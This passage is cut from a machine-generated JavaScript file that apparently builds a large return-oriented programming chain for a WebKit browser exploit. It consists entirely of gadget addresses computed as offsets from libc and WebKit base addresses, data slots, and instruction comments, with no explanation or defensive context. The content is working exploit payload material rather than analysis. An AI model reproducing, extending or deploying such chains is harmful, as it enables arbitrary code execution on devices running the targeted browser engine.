// 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+470296, //L10121 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+470312, //L10123 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10121: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10123: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+470456, //L10126 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+470424, //L10124 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+470440, //L10125 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10124: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10125: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10126: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+470536, //L10127 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10127: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10129: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+470656, //L10132 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+470640, //L10130 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10130: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi 
//L10132: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+470800, //L10135 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+470768, //L10133 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+470784, //L10134 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10133: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10134: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10135: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+470880, //L10136 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10136: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10138: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+471000, //L10141 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+470984, //L10139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10139: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10141: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+471144, //L10144 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+471112, //L10142 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+471128, //L10143 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); 
//L10142: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10143: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10144: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+471224, //L10145 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10145: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10147: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+471344, //L10150 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+471328, //L10148 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10148: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10150: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+471488, //L10153 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+471456, //L10151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+471472, //L10152 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10151: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10152: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10153: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+471568, //L10154 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10154: 
db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10156: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+471688, //L10159 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+471672, //L10157 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10157: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10159: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+471832, //L10162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+471800, //L10160 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+471816, //L10161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10160: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10161: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10162: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L10164: ropchain+471936, //L10163 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+296568, //__ntoa_long_long //L10163: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967216, 4294967295]); // -0x50 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+472008, //L10165 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10165: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); 
//pop rsi //L10167: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+472088, //L10169 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10169: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+488152, //L10168 //L10048: libc_base+764760, //pop rsi ropchain+472152, //L10171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10171: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10173: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+472272, //L10176 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+472256, //L10174 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10174: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10176: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+472448, //L10179 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+472464, //L10180 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+472416, //L10177 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+472432, //L10178 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10177: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10178: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10179: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10180: db([0, 0]); // 0x0 
set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+472560, //L10182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+472544, //L10181 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10181: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10182: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L10183: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L10184: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L10185: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+472760, //L10187 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10187: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+472816, //L10188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10188: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+472952, //L10192 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+472936, //L10191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+763368 //pop rcx ]); //L10190: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L10191: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10192: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+473088, //L10195 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+473120, //L10197 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+473072, //L10194 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10194: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10195: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10196: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10197: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+473232, //L10198+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+473224, //L10198 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L10198: db([0, 0]); // 0x0 set_gadgets([ ropchain+473248, //L10198+24 ropchain+477768, //L10193 libc_base+764760, //pop rsi ropchain+473288, //L10199 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10199: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10201: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+473408, //L10204 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+473392, //L10202 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10202: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10204: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+473584, //L10207 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+473600, //L10208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+473552, //L10205 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+473568, //L10206 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10205: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10206: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10207: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10208: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+473696, //L10210 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+473680, //L10209 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10209: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10210: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+473776, //L10211 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10211: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10213: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+473896, //L10216 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+473880, //L10214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10214: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10216: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+474072, //L10219 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+474088, //L10220 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+474040, //L10217 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+474056, //L10218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10217: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10218: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10219: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10220: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+474184, //L10222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+474168, //L10221 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10221: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10222: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+474264, //L10223 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10223: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop 
rsi //L10225: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+474384, //L10228 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+474368, //L10226 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10226: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10228: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+474560, //L10231 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+474576, //L10232 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+474528, //L10229 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+474544, //L10230 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10229: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10230: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10231: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10232: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+474672, //L10234 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+474656, //L10233 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10233: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10234: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+474752, //L10235 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10235: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10237: db([4294967252, 4294967295]); // -0x2c set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+474872, //L10240 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+474856, //L10238 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10238: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10240: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+475048, //L10243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+475064, //L10244 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+475016, //L10241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+475032, //L10242 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10241: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10242: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10243: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10244: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+475224, //L10248 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+475192, //L10246 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+475208, //L10247 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10245: db([32, 0]); // 0x20 
set_gadget(webkit_base+3236123,); //pop r9 //L10246: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10247: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10248: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+475328, //L10250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+475312, //L10249 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10249: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10250: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L10251: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10252: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+475496, //L10253 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10253: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10255: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+475616, //L10258 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+475600, //L10256 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10256: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10258: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] 
libc_base+764760, //pop rsi ropchain+475776, //L10262 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+475728, //L10259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+475744, //L10260 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10259: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10260: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10261: db([8, 0]); // 0x8 set_gadget(libc_base+759608,); //pop rax //L10262: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+475832, //L10263 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10263: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10265: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+475952, //L10266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+475968, //L10268 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10266: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10268: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+476112, //L10271 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+476080, //L10269 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+476096, //L10270 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10269: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); 
//pop rdi //L10270: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10271: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+476192, //L10272 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10272: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10274: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+476312, //L10277 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+476296, //L10275 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10275: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10277: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+476456, //L10280 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+476424, //L10278 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+476440, //L10279 webkit_base+660161, //mov [rsi], rax ; mov al, 1 